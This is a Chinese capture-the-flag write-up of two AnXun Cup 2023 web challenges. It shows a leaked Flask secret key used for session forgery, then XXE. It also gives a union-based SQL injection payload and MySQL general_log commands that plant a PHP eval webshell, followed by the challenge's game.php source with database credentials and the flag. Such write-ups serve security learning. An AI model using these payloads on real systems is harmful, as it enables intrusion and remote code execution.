安洵杯2023 只有两题web
CarelessPy 主页有个download路由,但是过滤了proc app.py part.py等一些关键词。
源码给出了另外两个路由/eval和/login
/eval路由一开始没懂,后来一开不就是根目录下的东西,列目录
查看/app路径文件
1 ['__pycache__', 'part.py', 'templates', 'static', 'app.py', 'requirements.txt']
pycache文件夹中含有pyc文件,在线网站反编译一下得到part.py
1 2 3 4 5 6 7 import osimport randomimport hashlibfrom flask import *from lxml import etreeapp = Flask(__name__) app.config['SECRET_KEY' ] = 'o2takuXX_donot_like_ntr'
从而得到KEY
再伪造session,登录login路由
XXE拿flag
Confronting robot 第一关sql注入,myname参数存在注入
1 2 3 database=robot_data version=10.3.20-MariaDB-log index_user@localhost
?myname=admin’union select group_concat(username) from name%23
这个路由可以直接执行sql语句,所以自然地想到日志写马
1 2 3 4 show variables like '%general%'; set global general_log = on; set global general_log_file = '/var/www/html/game.php'; select '<?php eval($_GET[1]);?>'
后面直接rce就行了。
game.php源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 <?php $db_host = "localhost" ;$db_user = "game" ;$db_pass = "this_1s_game_data_passwd" ;$db_name = "game_data" ;$con =new mysqli ($db_host ,$db_user ,$db_pass ,$db_name );if (!$con ) { echo "Failed to connect to MySQL " ; } function loseorwin (string $mychoice ,string $robotchoice if ($mychoice =="R" &&$robotchoice =="S" ){ return true ; } elseif ($mychoice =="S" &&$robotchoice =="P" ){ return true ; } elseif ($mychoice =="P" &&$robotchoice =="R" ){ return true ; } else { return false ; } } if (isset ($_GET ['round1' ])){ for ($i =1 ;$i <=10 ;$i ++){ $choicesql ="SELECT choice FROM `game` WHERE round='$i '" ; $choicesql_result =mysqli_query ($con ,$choicesql ); $choice_data = mysqli_fetch_array ($choicesql_result ); $choice [$i ]=$choice_data ['choice' ]; } $count =0 ; for ($j =1 ;$j <=10 ;$j ++){ $getchoice =$_GET ['round' .$j ]; if (isset ($_GET ['round' .$j ])){ if (loseorwin ($getchoice ,$choice [$j ])){ $count ++; } } } } ?> <!DOCTYPE html> <html lang="zh-CN" > <head> <div style="text-align:center" > <meta charset="UTF-8" > <title>Confronting robots</title> <style> form { position: absolute; top: 43 %; left: 65 %; transform: translate (-50 %, -50 %); } body { margin: 0 ; padding: 0 ; background-image: url ("/image/robot.jpg" ); background-size: cover; background-repeat: no-repeat; } </style> <link rel="stylesheet" href="style.css" /> </head> <body> <form action="" method="GET" > <h2>输入你的选择(R|P|S)</h2> <!-- 机器人的游戏策略:for ($i =1 ;$i <=10 ;$i ++){ $choice ="SELECT choice FROM `game` WHERE round='$i '" ; }--> <label for ="text1" >第一局:</label> <input type="text" name="round1" id="round1" ><br></br> <label for ="text2" >第二局:</label> <input type="text" name="round2" id="round2" ><br></br> <label for ="text1" >第三局:</label> <input type="text" name="round3" id="round3" ><br></br> <label for ="text2" >第四局:</label> <input type="text" name="round4" id="round4" ><br></br> <label for ="text1" >第五局:</label> <input type="text" name="round5" id="round5" ><br></br> <label for ="text2" >第六局:</label> <input type="text" name="round6" id="round6" ><br></br> <label for ="text1" >第七局:</label> <input type="text" name="round7" id="round7" ><br></br> <label for ="text2" >第八局:</label> <input type="text" name="round8" id="round8" ><br></br> <label for ="text2" >第九局:</label> <input type="text" name="round9" id="round9" ><br></br> <label for ="text2" >第十局:</label> <input type="text" name="round10" id="round10" ><br></br> <button type='submit' style="height: 70px;width: 320px;font-size: 20px;background-color: transparent; font-weight: bold;border: none;" >猜拳</button> <div> <?php if (isset ($_GET ['round1' ])){ if ($count ==10 ){ echo "SYCTF{ro8o7_RobOT_48ee9efbaa34}" ; } else { echo "你输了" ; } } ?> </div> </form> </body> </html>
